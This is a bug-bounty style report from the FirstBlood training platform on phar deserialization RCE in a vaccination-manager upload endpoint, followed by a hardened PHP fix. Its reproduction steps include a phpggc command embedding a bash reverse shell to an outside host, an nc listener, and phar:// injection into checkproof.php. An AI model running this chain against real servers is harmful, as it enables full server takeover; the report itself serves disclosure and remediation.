FirstBlood-#728 — Remote Command Execution via deserialization by uploading phar file
This issue was discovered on FirstBlood v2.0.0 (issues patched)
On 2021-10-27, neolex Level 2 reported:
It is possible for an attacker to get remote code execution by uploading a phar file via the https://792406c141d1-neolex.a.firstbloodhackers.com/vaccination-manager/pub/submit-vaccination-proof.php endpoint and then trigger the deserialization and get RCE using a
Steps to reproduce
Clone the following repository https://github.com/ambionics/phpggc and go inside the directory.
Run the following command:
./phpggc -pj /tmp/dummy.jpg -o /tmp/z.zip.phar monolog/rce4 "bash -i >& /dev/tcp/neolex.dev/8000 0>&1"
dummy.jpg: any valid jpg file, and replace neolex.dev with your domain or IP.
Listen on port 8000 on your server via:
nc -lnvp 8000
Upload the following image (/tmp/z.zip.phar) inside https://792406c141d1-neolex.a.firstbloodhackers.com/vaccination-manager/pub/upload-vaccination-proof.php
Look inside the Burp proxy for the request made to /api/checkproof.php. For example, in my case the request is for the URL: https://792406c141d1-neolex.a.firstbloodhackers.com/api/checkproof.php?proof=/app/firstblood/upload/89a7a1262c04e7f6800f064ee9fc6108bf5971cf.jpg
Send this request to Repeater, add phar:// before the path and send the request.
You should have a reverse shell inside your netcat listener.
Remote code execution. An attacker can completely take over the server and run a bash shell inside.
FirstBlood ID: 34
Vulnerability Type: Deserialization
This endpoint calls filesize() on the path provided in the 'proof' param with no filtering or sanitisation. By adding the phar:// stream handler to the path, an attacker can force a previously uploaded file to be sent through deserialisation. Coupled with the fact that a gadget-chain vulnerable version of monolog is being used, this allows for RCE.
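As an added illustration (not FirstBlood's own code), a hardened stand-in for the checkproof.php logic described above: it unregisters the phar wrapper, treats the proof parameter as a bare upload filename rather than a path, and only then calls filesize(). The upload directory and the 40-hex-character .jpg naming are assumptions taken from the report's example URL.

```php
<?php
// Added example, not FirstBlood's own code: a hardened stand-in for the
// 'proof' handling described in the advisory. Assumes uploads live under
// /app/firstblood/upload (path taken from the report) and that upload names
// are 40 hex chars + ".jpg", as in the report's example URL. PHP 7.1+.

define('UPLOAD_DIR', '/app/firstblood/upload');

// Defence in depth: if the application never needs phar archives, remove
// the wrapper so "phar://" paths cannot reach any filesystem function.
if (in_array('phar', stream_get_wrappers(), true)) {
    stream_wrapper_unregister('phar');
}

// Vulnerable pattern from the advisory: filesize() on the raw parameter.
// Before PHP 8.0, filesystem functions (filesize, file_exists, is_file, ...)
// on a "phar://" path unserialize the archive metadata, which is what fires
// the monolog gadget chain.
function checkProofVulnerable($proof)
{
    return @filesize($proof);
}

// Hardened version: the parameter is a filename, never a path or URL.
function checkProofHardened($proof)
{
    // 1. Allow-list the exact shape of an upload name. This also rejects
    //    stream wrappers (phar://, php://, data://), directory separators,
    //    NUL bytes and "../" traversal in one check.
    if (!preg_match('/^[a-f0-9]{40}\.jpg$/', $proof)) {
        return false;
    }
    // 2. Resolve the name inside the upload directory and confirm the
    //    resolved path really is under it (guards against symlinks).
    $base = realpath(UPLOAD_DIR);
    $real = realpath(UPLOAD_DIR . '/' . $proof);
    if ($base === false || $real === false || strpos($real, $base . '/') !== 0) {
        return false;
    }
    return filesize($real);
}

// Constructed input mirroring the report's request, with the wrapper added:
$attackerInput = 'phar:///app/firstblood/upload/89a7a1262c04e7f6800f064ee9fc6108bf5971cf.jpg';
var_dump(checkProofHardened($attackerInput));
```

The allow-list check runs before any filesystem function touches the value, so a wrapper-prefixed path is rejected without ever being opened.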